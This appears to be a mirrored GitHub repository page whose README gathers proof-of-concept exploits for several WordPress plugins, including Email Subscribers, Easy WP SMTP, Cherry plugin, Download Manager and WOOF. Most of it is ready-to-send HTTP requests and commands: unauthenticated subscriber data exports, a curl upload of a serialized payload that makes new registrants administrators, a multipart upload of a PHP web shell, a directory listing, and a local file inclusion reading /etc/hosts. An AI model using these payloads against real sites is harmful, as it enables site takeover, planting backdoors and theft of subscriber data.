https://github.com/randomrobbiebf/wordpress-exploits

Random Wordpres Exploits May or May Not Work.
https://github.com/randomrobbiebf/wordpress-exploits

Last synced: about 1 month ago
JSON representation

Random Wordpres Exploits May or May Not Work.

• Host: GitHub
• URL: https://github.com/randomrobbiebf/wordpress-exploits
• Owner: RandomRobbieBF
• Created: 2020-04-23T14:38:42.000Z (almost 6 years ago)
• Default Branch: master
• Last Pushed: 2020-12-09T10:20:09.000Z (about 5 years ago)
• Last Synced: 2025-01-21T05:41:44.192Z (about 1 year ago)
• Size: 12.7 KB
• Stars: 3
• Watchers: 2
• Forks: 3
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

README

          
# wordpress-exploits

Random Wordpress Exploits May or May Not Work.

CVE-2019-19985

---

# Info

```

Description: Unauthenticated File Download w/ Information Disclosure

CVE ID: CVE-2019-19985

CVSS v3.0 Score: 5.8 (Medium)

CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

Affected Plugin: Email Subscribers & Newsletters

Plugin Slug: email-subscribers

Affected Versions: <= 4.2.2

Patched Version: 4.2.3

```

### POC

```

GET /wp-admin/admin.php?page=download_report&report=users&status=all HTTP/1.1

Host: kubernetes.docker.internal

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://kubernetes.docker.internal/wp-admin/admin.php?page=es_subscribers&action=export

Connection: close

Content-Length: 2

```

### Info

```

Easy WP SMTP Plugin for WordPress 1.3.9 RCE/Add Admin

The popular Easy WP SMTP plugin, which as 300,000+ active installations, was prone to a critical zero-day vulnerability that allowed an unauthenticated user to modify WordPress options or to inject and execute code among other malicious actions.

```

### POC

```

In the following proof of concept, Its going to use swpsmtp_import_settings to upload a file that will contain a malicious serialized payload that will enable users registration (users_can_register) and set the user default role (default_role) to “administrator” in the database.

1. Create a file name “/tmp/upload.txt” and add this content to it:

> a:2:{s:4:"data";s:81:"a:2:{s:18:"users_can_register";s:1:"1";s:12:"default_role";s:13:"administrator";}";s:8:"checksum";s:32:"3ce5fb6d7b1dbd6252f4b5b3526650c8";}

2. Upload the file:

>$ curl https://TARGET.COM/wp-admin/admin-ajax.php -F 'action=swpsmtp_clear_log' -F 'swpsmtp_import_settings=1' -F 'swpsmtp_import_settings_file=@/tmp/upload.txt'

```

### Info

```

The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.

```

### POC

```

POST /wp-content/plugins/cherry-plugin/admin/import-export/upload.php HTTP/1.1 Host: lovi.studio Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0 Content-Length: 522 Content-Type: multipart/form-data; boundary=db6aa92af633763a3f43abd6cde64077 --db6aa92af633763a3f43abd6cde64077 Content-Disposition: form-data; name="file"; filename="shell.php" =`$_GET[0]`?>

```

### Info

```

WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure

```

### POC

```

POST /?es=export HTTP/1.1

Host: kubernetes.docker.internal

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 27

option=view_all_subscribers

```

Download Manager < 2.6.3 

----

```

POST /wp-admin/admin.php?task=wpdm_dir_tree HTTP/1.1

Host: 192.168.1.134

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.1.134/wp-admin/post-new.php?post_type=wpdmpro

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Content-Length: 33

Origin: http://192.168.1.134

Connection: close

dir=%2Fvar%2Fwww/html/wp-content/

```

TITLE

Arbitrary Shortcode Execution & Local File Inclusion

PRODUCT

WOOF - WooCommerce Products Filter (PluginUs.Net)

VULNERABLE VERSION

1.1.9

FIXED VERSION

2.2.0

```

POST /wp-admin/admin-ajax.php HTTP/1.1

Host: wordpress.lan

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Length: 75

action=woof_redraw_woof&shortcode=woof_search_options&pagepath=/etc/hosts

```